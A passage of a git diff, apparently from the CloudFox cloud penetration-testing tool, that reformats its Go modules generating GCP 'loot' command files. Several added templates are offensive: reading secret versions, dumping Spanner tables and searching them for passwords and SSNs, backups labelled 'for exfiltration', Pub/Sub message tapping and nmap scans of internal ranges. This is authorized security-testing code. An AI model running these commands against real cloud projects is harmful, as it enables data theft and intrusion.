CloudFox\n# WARNING: Only use with proper authorization\n\n", } // Get ancestry for this project @@ -717,9 +717,9 @@ func (m *PermissionsModule) generateEnumerationLoot() { // Add organization-level enumeration commands for _, orgID := range m.OrgIDs { orgName := m.OrgNames[orgID] - loot.Contents += fmt.Sprintf("# =====================================================\n") + loot.Contents += fmt.Sprintf("# =============================================================================\n") loot.Contents += fmt.Sprintf("# Organization: %s (%s)\n", orgName, orgID) - loot.Contents += fmt.Sprintf("# =====================================================\n\n") + loot.Contents += fmt.Sprintf("# =============================================================================\n\n") loot.Contents += fmt.Sprintf("# List all IAM bindings for organization\n") loot.Contents += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json\n\n", orgID) @@ -734,9 +734,9 @@ func (m *PermissionsModule) generateEnumerationLoot() { // Add project-level enumeration commands for _, projectID := range m.ProjectIDs { projectName := m.GetProjectName(projectID) - loot.Contents += fmt.Sprintf("# =====================================================\n") + loot.Contents += fmt.Sprintf("# =============================================================================\n") loot.Contents += fmt.Sprintf("# Project: %s (%s)\n", projectName, projectID) - loot.Contents += fmt.Sprintf("# =====================================================\n\n") + loot.Contents += fmt.Sprintf("# =============================================================================\n\n") loot.Contents += fmt.Sprintf("# List all IAM bindings for project\n") loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json\n\n", projectID) @@ -761,9 +761,9 @@ func (m *PermissionsModule) generateEnumerationLoot() { } // Add entity-specific enumeration based on discovered permissions - loot.Contents += fmt.Sprintf("# =====================================================\n") + loot.Contents += fmt.Sprintf("# =============================================================================\n") loot.Contents += fmt.Sprintf("# Entity-Specific Permission Enumeration\n") - loot.Contents += fmt.Sprintf("# =====================================================\n\n") + loot.Contents += fmt.Sprintf("# =============================================================================\n\n") // Collect unique entities with their roles entityRoles := make(map[string]map[string]bool) // entity -> set of roles @@ -857,9 +857,9 @@ func (m *PermissionsModule) generateEnumerationLoot() { } // Add high-privilege permission search commands - loot.Contents += fmt.Sprintf("# =====================================================\n") + loot.Contents += fmt.Sprintf("# =============================================================================\n") loot.Contents += fmt.Sprintf("# High-Privilege Permission Search\n") - loot.Contents += fmt.Sprintf("# =====================================================\n\n") + loot.Contents += fmt.Sprintf("# =============================================================================\n\n") loot.Contents += fmt.Sprintf("# Find entities with setIamPolicy permissions\n") for _, projectID := range m.ProjectIDs { diff --git a/gcp/commands/privateserviceconnect.go b/gcp/commands/privateserviceconnect.go index 47d6b139..9a2dca4c 100644 --- a/gcp/commands/privateserviceconnect.go +++ b/gcp/commands/privateserviceconnect.go @@ -214,20 +214,28 @@ func (m *PrivateServiceConnectModule) addPSCEndpointToLoot(projectID string, end return } lootFile.Contents += fmt.Sprintf( - "## PSC Endpoint: %s (Project: %s, Region: %s)\n"+ + "# =============================================================================\n"+ + "# PSC ENDPOINT: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ "# Network: %s, Subnet: %s\n"+ "# Target Type: %s, Target: %s\n"+ - "# State: %s, IP: %s\n\n"+ - "# Describe forwarding rule:\n"+ - "gcloud compute forwarding-rules describe %s --region=%s --project=%s\n\n", + "# State: %s, IP: %s\n\n", endpoint.Name, endpoint.ProjectID, endpoint.Region, endpoint.Network, endpoint.Subnetwork, endpoint.TargetType, endpoint.Target, endpoint.ConnectionState, endpoint.IPAddress, + ) + + lootFile.Contents += "# === ENUMERATION COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# Describe forwarding rule:\n"+ + "gcloud compute forwarding-rules describe %s --region=%s --project=%s\n\n", endpoint.Name, endpoint.Region, endpoint.ProjectID, ) if endpoint.IPAddress != "" { + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" lootFile.Contents += fmt.Sprintf( "# Scan internal endpoint (from within VPC):\n"+ "nmap -sV -Pn %s\n\n", @@ -251,22 +259,32 @@ func (m *PrivateServiceConnectModule) addPrivateConnectionToLoot(projectID strin } lootFile.Contents += fmt.Sprintf( - "## Private Connection: %s (Project: %s)\n"+ + "# =============================================================================\n"+ + "# PRIVATE CONNECTION: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ "# Network: %s, Service: %s\n"+ "# Peering: %s\n"+ "# Reserved Ranges: %s\n"+ - "# Accessible Services: %s\n\n"+ - "# List private connections:\n"+ - "gcloud services vpc-peerings list --network=%s --project=%s\n\n", + "# Accessible Services: %s\n\n", conn.Name, conn.ProjectID, conn.Network, conn.Service, conn.PeeringName, reservedRanges, accessibleServices, + ) + + lootFile.Contents += "# === ENUMERATION COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# List private connections:\n"+ + "gcloud services vpc-peerings list --network=%s --project=%s\n\n", conn.Network, conn.ProjectID, ) // Add nmap commands for each reserved range + if len(conn.ReservedRanges) > 0 { + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + } for _, ipRange := range conn.ReservedRanges { lootFile.Contents += fmt.Sprintf( "# Scan private connection range (from within VPC):\n"+ @@ -287,12 +305,16 @@ func (m *PrivateServiceConnectModule) addServiceAttachmentToLoot(projectID strin } lootFile.Contents += fmt.Sprintf( - "## Service Attachment: %s (Project: %s, Region: %s)\n"+ + "# =============================================================================\n"+ + "# SERVICE ATTACHMENT: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ "# Target Service: %s\n"+ "# Connection Preference: %s\n"+ "# Connected Endpoints: %d\n"+ "# NAT Subnets: %s\n", - attachment.Name, attachment.ProjectID, attachment.Region, + attachment.Name, + attachment.ProjectID, attachment.Region, attachment.TargetService, attachment.ConnectionPreference, attachment.ConnectedEndpoints, @@ -314,8 +336,9 @@ func (m *PrivateServiceConnectModule) addServiceAttachmentToLoot(projectID strin } } + lootFile.Contents += "\n# === ENUMERATION COMMANDS ===\n\n" lootFile.Contents += fmt.Sprintf( - "\n# Describe service attachment:\n"+ + "# Describe service attachment:\n"+ "gcloud compute service-attachments describe %s --region=%s --project=%s\n\n"+ "# Get IAM policy:\n"+ "gcloud compute service-attachments get-iam-policy %s --region=%s --project=%s\n\n", @@ -325,6 +348,7 @@ func (m *PrivateServiceConnectModule) addServiceAttachmentToLoot(projectID strin // If auto-accept, add exploitation command if attachment.ConnectionPreference == "ACCEPT_AUTOMATIC" { + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" lootFile.Contents += fmt.Sprintf( "# [HIGH RISK] This service attachment accepts connections from ANY project!\n"+ "# To connect from another project:\n"+ diff --git a/gcp/commands/publicaccess.go b/gcp/commands/publicaccess.go index 1426e206..37d92a26 100644 --- a/gcp/commands/publicaccess.go +++ b/gcp/commands/publicaccess.go @@ -164,7 +164,7 @@ func (m *PublicAccessModule) processProject(ctx context.Context, projectID strin } m.LootMap[projectID]["public-access-commands"] = &internal.LootFile{ Name: "public-access-commands", - Contents: "# Public Access Exploitation Commands\n# Generated by CloudFox\n# WARNING: These resources are publicly accessible!\n\n", + Contents: "# Public Access Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } m.mu.Unlock() @@ -989,7 +989,10 @@ func (m *PublicAccessModule) getAllPublicResources() []PublicResource { // ------------------------------ func (m *PublicAccessModule) addResourceToLoot(resource PublicResource, projectID string) { m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( - "## [%s] %s: %s (Project: %s)\n"+ + "# =============================================================================\n"+ + "# [%s] %s: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ "# Access: %s\n"+ "# Role: %s\n", resource.AccessLevel, @@ -1001,6 +1004,7 @@ func (m *PublicAccessModule) addResourceToLoot(resource PublicResource, projectI ) // Add type-specific commands + m.LootMap[projectID]["public-access-commands"].Contents += "\n# === EXPLOIT COMMANDS ===\n\n" switch resource.ResourceType { case "Cloud Storage": m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( @@ -1141,7 +1145,7 @@ func (m *PublicAccessModule) writeHierarchicalOutput(ctx context.Context, logger var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: These resources are publicly accessible!\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -1216,7 +1220,7 @@ func (m *PublicAccessModule) writeFlatOutput(ctx context.Context, logger interna var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: These resources are publicly accessible!\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/pubsub.go b/gcp/commands/pubsub.go index 4c8659a3..c2d68e0b 100644 --- a/gcp/commands/pubsub.go +++ b/gcp/commands/pubsub.go @@ -233,9 +233,9 @@ func (m *PubSubModule) addTopicToLoot(projectID string, topic PubSubService.Topi } lootFile.Contents += fmt.Sprintf( - "# ==========================================\n"+ + "# =============================================================================\n"+ "# TOPIC: %s%s\n"+ - "# ==========================================\n"+ + "# =============================================================================\n"+ "# Project: %s\n"+ "# Subscriptions: %d\n", topic.Name, publicAccess, @@ -272,7 +272,7 @@ gcloud pubsub topics list-subscriptions %s --project=%s # List snapshots for this topic gcloud pubsub snapshots list --filter="topic:%s" --project=%s -# === EXPLOITATION COMMANDS === +# === EXPLOIT COMMANDS === # Publish a test message (requires pubsub.topics.publish) gcloud pubsub topics publish %s --message='{"test": "message"}' --project=%s @@ -341,9 +341,9 @@ func (m *PubSubModule) addSubscriptionToLoot(projectID string, sub PubSubService } lootFile.Contents += fmt.Sprintf( - "# ==========================================\n"+ + "# -----------------------------------------------------------------------------\n"+ "# SUBSCRIPTION: %s%s\n"+ - "# ==========================================\n"+ + "# -----------------------------------------------------------------------------\n"+ "# Project: %s\n"+ "# Topic: %s\n", sub.Name, publicAccess, @@ -418,7 +418,7 @@ gcloud pubsub subscriptions get-iam-policy %s --project=%s # List snapshots for this subscription gcloud pubsub snapshots list --project=%s -# === EXPLOITATION COMMANDS === +# === EXPLOIT COMMANDS === # Pull messages WITHOUT acknowledging (peek at messages, they stay in queue) gcloud pubsub subscriptions pull %s --project=%s --limit=100 diff --git a/gcp/commands/resourceiam.go b/gcp/commands/resourceiam.go index 7afb5c9e..fd4c27fd 100644 --- a/gcp/commands/resourceiam.go +++ b/gcp/commands/resourceiam.go @@ -134,11 +134,11 @@ func (m *ResourceIAMModule) processProject(ctx context.Context, projectID string } m.LootMap[projectID]["resource-iam-commands"] = &internal.LootFile{ Name: "resource-iam-commands", - Contents: "# Resource IAM Commands\n# Generated by CloudFox\n\n", + Contents: "# Resource IAM Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } m.LootMap[projectID]["public-resources"] = &internal.LootFile{ Name: "public-resources", - Contents: "# Public Resources\n# Generated by CloudFox\n# These resources have allUsers or allAuthenticatedUsers access!\n\n", + Contents: "# Public Resources\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } m.mu.Unlock() @@ -154,8 +154,9 @@ func (m *ResourceIAMModule) processProject(ctx context.Context, projectID string m.mu.Lock() m.ProjectBindings[projectID] = append(m.ProjectBindings[projectID], bindings...) - // Generate loot for public resources + // Generate loot for all resources for _, b := range bindings { + m.addResourceToLoot(b, projectID) if b.IsPublic { m.addPublicResourceToLoot(b, projectID) } @@ -179,8 +180,111 @@ func (m *ResourceIAMModule) getAllBindings() []resourceiamservice.ResourceIAMBin // ------------------------------ // Loot Management // ------------------------------ +func (m *ResourceIAMModule) addResourceToLoot(b resourceiamservice.ResourceIAMBinding, projectID string) { + lootFile := m.LootMap[projectID]["resource-iam-commands"] + if lootFile == nil { + return + } + + // Generate enumeration and exploit commands based on resource type + switch b.ResourceType { + case "bucket": + lootFile.Contents += fmt.Sprintf( + "# Bucket: %s (Member: %s, Role: %s)\n"+ + "gsutil iam get %s\n"+ + "gsutil ls %s\n"+ + "gsutil ls -L %s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceName, b.ResourceName, b.ResourceName, + ) + case "dataset": + lootFile.Contents += fmt.Sprintf( + "# BigQuery Dataset: %s (Member: %s, Role: %s)\n"+ + "bq show --format=prettyjson %s\n"+ + "bq ls %s\n"+ + "bq query --use_legacy_sql=false 'SELECT table_name FROM `%s`.INFORMATION_SCHEMA.TABLES'\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceName, b.ResourceName, b.ResourceID, + ) + case "topic": + lootFile.Contents += fmt.Sprintf( + "# Pub/Sub Topic: %s (Member: %s, Role: %s)\n"+ + "gcloud pubsub topics describe %s --project=%s\n"+ + "gcloud pubsub topics get-iam-policy %s --project=%s\n"+ + "# Create a subscription to read messages:\n"+ + "gcloud pubsub subscriptions create cloudfox-tap-%s --topic=%s --project=%s\n"+ + "gcloud pubsub subscriptions pull cloudfox-tap-%s --auto-ack --limit=10 --project=%s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + ) + case "subscription": + lootFile.Contents += fmt.Sprintf( + "# Pub/Sub Subscription: %s (Member: %s, Role: %s)\n"+ + "gcloud pubsub subscriptions describe %s --project=%s\n"+ + "gcloud pubsub subscriptions get-iam-policy %s --project=%s\n"+ + "# Pull messages from subscription:\n"+ + "gcloud pubsub subscriptions pull %s --auto-ack --limit=10 --project=%s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + ) + case "secret": + lootFile.Contents += fmt.Sprintf( + "# Secret Manager Secret: %s (Member: %s, Role: %s)\n"+ + "gcloud secrets describe %s --project=%s\n"+ + "gcloud secrets versions list %s --project=%s\n"+ + "gcloud secrets versions access latest --secret=%s --project=%s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + ) + case "cryptokey": + lootFile.Contents += fmt.Sprintf( + "# KMS CryptoKey: %s (Member: %s, Role: %s)\n"+ + "gcloud kms keys describe %s --format=json\n"+ + "gcloud kms keys get-iam-policy %s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceName, b.ResourceName, + ) + case "function": + lootFile.Contents += fmt.Sprintf( + "# Cloud Function: %s (Member: %s, Role: %s)\n"+ + "gcloud functions describe %s --project=%s\n"+ + "gcloud functions get-iam-policy %s --project=%s\n"+ + "# Invoke function (if invoker role):\n"+ + "gcloud functions call %s --project=%s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + ) + case "cloudrun": + lootFile.Contents += fmt.Sprintf( + "# Cloud Run Service: %s (Member: %s, Role: %s)\n"+ + "gcloud run services describe %s --project=%s --format=json\n"+ + "gcloud run services get-iam-policy %s --project=%s\n"+ + "# Get service URL and test access:\n"+ + "gcloud run services describe %s --project=%s --format='value(status.url)'\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + ) + } +} + func (m *ResourceIAMModule) addPublicResourceToLoot(b resourceiamservice.ResourceIAMBinding, projectID string) { - m.LootMap[projectID]["public-resources"].Contents += fmt.Sprintf( + lootFile := m.LootMap[projectID]["public-resources"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( "# %s: %s\n# Member: %s, Role: %s\n", b.ResourceType, b.ResourceName, b.Member, b.Role, ) @@ -188,17 +292,17 @@ func (m *ResourceIAMModule) addPublicResourceToLoot(b resourceiamservice.Resourc // Add exploitation commands based on resource type switch b.ResourceType { case "bucket": - m.LootMap[projectID]["public-resources"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "gsutil ls %s\ngsutil cat %s/*\n\n", b.ResourceName, b.ResourceName, ) case "function": - m.LootMap[projectID]["public-resources"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Function may be publicly invokable\ngcloud functions describe %s --project=%s\n\n", b.ResourceID, b.ProjectID, ) case "cloudrun": - m.LootMap[projectID]["public-resources"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Cloud Run service may be publicly accessible\ngcloud run services describe %s --project=%s\n\n", b.ResourceID, b.ProjectID, ) @@ -331,8 +435,7 @@ func (m *ResourceIAMModule) writeHierarchicalOutput(ctx context.Context, logger var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") && - !strings.HasSuffix(loot.Contents, "# These resources have allUsers or allAuthenticatedUsers access!\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -461,8 +564,7 @@ func (m *ResourceIAMModule) writeFlatOutput(ctx context.Context, logger internal var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") && - !strings.HasSuffix(loot.Contents, "# These resources have allUsers or allAuthenticatedUsers access!\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/scheduler.go b/gcp/commands/scheduler.go index 898df5b1..0d4c47f7 100644 --- a/gcp/commands/scheduler.go +++ b/gcp/commands/scheduler.go @@ -185,11 +185,15 @@ func (m *SchedulerModule) addJobToLoot(projectID string, job SchedulerService.Jo target := formatTargetFull(job) lootFile.Contents += fmt.Sprintf( - "## Job: %s (Project: %s, Location: %s)\n"+ + "# =============================================================================\n"+ + "# SCHEDULER JOB: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n"+ "# State: %s\n"+ "# Schedule: %s (%s)\n"+ "# Target: %s -> %s\n", - job.Name, job.ProjectID, job.Location, + job.Name, + job.ProjectID, job.Location, job.State, job.Schedule, job.TimeZone, job.TargetType, target, @@ -203,8 +207,10 @@ func (m *SchedulerModule) addJobToLoot(projectID string, job SchedulerService.Jo } lootFile.Contents += fmt.Sprintf( - "\n# Describe job:\n"+ + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe job:\n"+ "gcloud scheduler jobs describe %s --location=%s --project=%s\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ "# Run job immediately:\n"+ "gcloud scheduler jobs run %s --location=%s --project=%s\n\n"+ "# Pause job:\n"+ diff --git a/gcp/commands/secrets.go b/gcp/commands/secrets.go index fa62de42..94aa29c9 100644 --- a/gcp/commands/secrets.go +++ b/gcp/commands/secrets.go @@ -188,9 +188,9 @@ func (m *SecretsModule) addSecretToLoot(projectID string, secret SecretsService. secretName := getSecretShortName(secret.Name) lootFile.Contents += fmt.Sprintf( - "# ==========================================\n"+ + "# =============================================================================\n"+ "# SECRET: %s (Project: %s)\n"+ - "# ==========================================\n"+ + "# =============================================================================\n"+ "# Encryption: %s, Replication: %s, Rotation: %s\n"+ "# Created: %s\n", secretName, secret.ProjectID, @@ -227,12 +227,14 @@ func (m *SecretsModule) addSecretToLoot(projectID string, secret SecretsService. // Commands lootFile.Contents += fmt.Sprintf( - "\n# Describe secret:\n"+ + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe secret:\n"+ "gcloud secrets describe %s --project=%s\n"+ "# List versions:\n"+ "gcloud secrets versions list %s --project=%s\n"+ "# Get IAM policy:\n"+ - "gcloud secrets get-iam-policy %s --project=%s\n"+ + "gcloud secrets get-iam-policy %s --project=%s\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ "# Access latest version:\n"+ "gcloud secrets versions access latest --secret=%s --project=%s\n"+ "# Download all versions:\n"+ diff --git a/gcp/commands/securitycenter.go b/gcp/commands/securitycenter.go index 70c8394c..fbd46b61 100644 --- a/gcp/commands/securitycenter.go +++ b/gcp/commands/securitycenter.go @@ -361,7 +361,9 @@ func (m *SecurityCenterModule) addFindingToLoot(finding SCCFinding, projectID st } m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( - "## Finding: %s (%s)\n"+ + "# =============================================================================\n"+ + "# FINDING: %s (%s)\n"+ + "# =============================================================================\n"+ "# Category: %s\n"+ "# Resource: %s\n"+ "# Project: %s\n", @@ -380,13 +382,15 @@ func (m *SecurityCenterModule) addFindingToLoot(finding SCCFinding, projectID st } // Add gcloud commands + m.LootMap[projectID]["security-center-commands"].Contents += "\n# === ENUMERATION COMMANDS ===\n\n" m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( - "\n# View finding details:\n"+ + "# View finding details:\n"+ "gcloud scc findings list --source=\"-\" --project=%s --filter=\"name:\\\"%s\\\"\"\n\n", projectID, finding.Name, ) // Add specific commands based on category + m.LootMap[projectID]["security-center-commands"].Contents += "# === REMEDIATION COMMANDS ===\n\n" categoryLower := strings.ToLower(finding.Category) switch { case strings.Contains(categoryLower, "public_bucket"): diff --git a/gcp/commands/serviceaccounts.go b/gcp/commands/serviceaccounts.go index 71efddad..660c63d2 100644 --- a/gcp/commands/serviceaccounts.go +++ b/gcp/commands/serviceaccounts.go @@ -215,7 +215,7 @@ func (m *ServiceAccountsModule) processProject(ctx context.Context, projectID st m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["serviceaccounts-commands"] = &internal.LootFile{ Name: "serviceaccounts-commands", - Contents: "# Service Account Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + Contents: "# Service Account Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n# See also: iam-commands/iam-enumeration for IAM policy analysis and high-privilege role flags\n\n", } } @@ -338,9 +338,9 @@ func (m *ServiceAccountsModule) addServiceAccountToLoot(projectID string, sa Ser keyFileName := strings.Split(sa.Email, "@")[0] lootFile.Contents += fmt.Sprintf( - "# ==========================================\n"+ + "# =============================================================================\n"+ "# SERVICE ACCOUNT: %s\n"+ - "# ==========================================\n", + "# =============================================================================\n", sa.Email, ) @@ -408,7 +408,7 @@ gcloud asset search-all-iam-policies --scope=projects/%s --query='policy:%s' --f projectID, sa.Email, sa.Email, projectID, sa.Email) - lootFile.Contents += fmt.Sprintf(`# === EXPLOITATION COMMANDS === + lootFile.Contents += fmt.Sprintf(`# === EXPLOIT COMMANDS === # Impersonate SA - get access token gcloud auth print-access-token --impersonate-service-account=%s diff --git a/gcp/commands/serviceagents.go b/gcp/commands/serviceagents.go index f6340886..b7b4788e 100644 --- a/gcp/commands/serviceagents.go +++ b/gcp/commands/serviceagents.go @@ -183,9 +183,9 @@ func (m *ServiceAgentsModule) addAgentToLoot(projectID string, agent serviceagen } lootFile.Contents += fmt.Sprintf( - "# ==========================================\n"+ + "# =============================================================================\n"+ "# SERVICE AGENT: %s%s\n"+ - "# ==========================================\n"+ + "# =============================================================================\n"+ "# Email: %s\n"+ "# Description: %s\n", agent.ServiceName, crossProjectNote, diff --git a/gcp/commands/sourcerepos.go b/gcp/commands/sourcerepos.go index ee2a7aea..4e7f74d5 100644 --- a/gcp/commands/sourcerepos.go +++ b/gcp/commands/sourcerepos.go @@ -156,9 +156,9 @@ func (m *SourceReposModule) addRepoToLoot(projectID string, repo sourcereposserv } lootFile.Contents += fmt.Sprintf( - "# ==========================================\n"+ + "# =============================================================================\n"+ "# REPOSITORY: %s\n"+ - "# ==========================================\n"+ + "# =============================================================================\n"+ "# Project: %s\n", repo.Name, repo.ProjectID, ) diff --git a/gcp/commands/spanner.go b/gcp/commands/spanner.go index 951a44ae..79e9f1c0 100644 --- a/gcp/commands/spanner.go +++ b/gcp/commands/spanner.go @@ -137,9 +137,9 @@ func (m *SpannerModule) addInstanceToLoot(projectID string, instance spannerserv return } lootFile.Contents += fmt.Sprintf( - "# ==========================================\n"+ + "# =============================================================================\n"+ "# INSTANCE: %s\n"+ - "# ==========================================\n"+ + "# =============================================================================\n"+ "# Project: %s\n"+ "# Display Name: %s\n"+ "# Config: %s\n"+ @@ -176,9 +176,9 @@ func (m *SpannerModule) addDatabaseToLoot(projectID string, database spannerserv return } lootFile.Contents += fmt.Sprintf( - "# ------------------------------------------\n"+ + "# -----------------------------------------------------------------------------\n"+ "# DATABASE: %s (Instance: %s)\n"+ - "# ------------------------------------------\n"+ + "# -----------------------------------------------------------------------------\n"+ "# Project: %s\n"+ "# State: %s\n"+ "# Encryption: %s\n", @@ -198,15 +198,53 @@ func (m *SpannerModule) addDatabaseToLoot(projectID string, database spannerserv } } + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe database: +gcloud spanner databases describe %s --instance=%s --project=%s + +# Get database IAM policy: +gcloud spanner databases get-iam-policy %s --instance=%s --project=%s + +# List all tables: +gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql="SELECT * FROM INFORMATION_SCHEMA.TABLES" + +# List all columns for all tables: +gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql="SELECT TABLE_NAME, COLUMN_NAME, SPANNER_TYPE FROM INFORMATION_SCHEMA.COLUMNS ORDER BY TABLE_NAME" + +# List indexes: +gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql="SELECT * FROM INFORMATION_SCHEMA.INDEXES" + +# Get DDL (schema dump): +gcloud spanner databases ddl describe %s --instance=%s --project=%s + +`, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + ) + + // === EXPLOIT COMMANDS === lootFile.Contents += fmt.Sprintf( - "\n# Describe database:\n"+ - "gcloud spanner databases describe %s --instance=%s --project=%s\n\n"+ - "# Get database IAM policy:\n"+ - "gcloud spanner databases get-iam-policy %s --instance=%s --project=%s\n\n"+ - "# Execute SQL query:\n"+ - "gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql=\"SELECT * FROM INFORMATION_SCHEMA.TABLES\"\n\n", + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Dump data from tables (replace TABLE_NAME):\n"+ + "gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql=\"SELECT * FROM TABLE_NAME LIMIT 100\"\n\n"+ + "# Dump all rows from a table:\n"+ + "gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql=\"SELECT * FROM TABLE_NAME\" --format=json > /tmp/spanner-dump.json\n\n"+ + "# Search for sensitive data patterns:\n"+ + "gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql=\"SELECT TABLE_NAME, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE LOWER(COLUMN_NAME) LIKE '%%password%%' OR LOWER(COLUMN_NAME) LIKE '%%secret%%' OR LOWER(COLUMN_NAME) LIKE '%%token%%' OR LOWER(COLUMN_NAME) LIKE '%%key%%' OR LOWER(COLUMN_NAME) LIKE '%%credit%%' OR LOWER(COLUMN_NAME) LIKE '%%ssn%%'\"\n\n"+ + "# Create a backup (for exfiltration):\n"+ + "gcloud spanner backups create cloudfox-backup --instance=%s --database=%s --project=%s --expiration-date=$(date -u -d '+7 days' '+%%Y-%%m-%%dT%%H:%%M:%%SZ') --async\n\n"+ + "# Export database to GCS:\n"+ + "gcloud spanner databases export %s --instance=%s --project=%s --output-uri=gs://BUCKET_NAME/spanner-export/\n\n", + database.Name, database.InstanceName, database.ProjectID, database.Name, database.InstanceName, database.ProjectID, database.Name, database.InstanceName, database.ProjectID, + database.InstanceName, database.Name, database.ProjectID, database.Name, database.InstanceName, database.ProjectID, ) } diff --git a/gcp/commands/vpcnetworks.go b/gcp/commands/vpcnetworks.go index 4c6adc47..1f2f7a23 100644 --- a/gcp/commands/vpcnetworks.go +++ b/gcp/commands/vpcnetworks.go @@ -127,7 +127,7 @@ func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["vpcnetworks-commands"] = &internal.LootFile{ Name: "vpcnetworks-commands", - Contents: "# VPC Networks Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + Contents: "# VPC Networks Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n# See also: network-topology-commands for comprehensive topology with NAT/SharedVPC\n\n", } } m.mu.Unlock() @@ -196,9 +196,9 @@ func (m *VPCNetworksModule) addNetworkToLoot(projectID string, network vpcservic return } lootFile.Contents += fmt.Sprintf( - "# ==========================================\n"+ + "# =============================================================================\n"+ "# NETWORK: %s\n"+ - "# ==========================================\n"+ + "# =============================================================================\n"+ "# Project: %s\n"+ "# Routing Mode: %s\n"+ "# Auto Create Subnets: %v\n"+ @@ -228,9 +228,9 @@ func (m *VPCNetworksModule) addSubnetToLoot(projectID string, subnet vpcservice. return } lootFile.Contents += fmt.Sprintf( - "# ------------------------------------------\n"+ + "# -----------------------------------------------------------------------------\n"+ "# SUBNET: %s (Network: %s)\n"+ - "# ------------------------------------------\n"+ + "# -----------------------------------------------------------------------------\n"+ "# Project: %s\n"+ "# Region: %s\n"+ "# CIDR: %s\n"+ @@ -254,9 +254,9 @@ func (m *VPCNetworksModule) addPeeringToLoot(projectID string, peering vpcservic return } lootFile.Contents += fmt.Sprintf( - "# ------------------------------------------\n"+ + "# -----------------------------------------------------------------------------\n"+ "# PEERING: %s\n"+ - "# 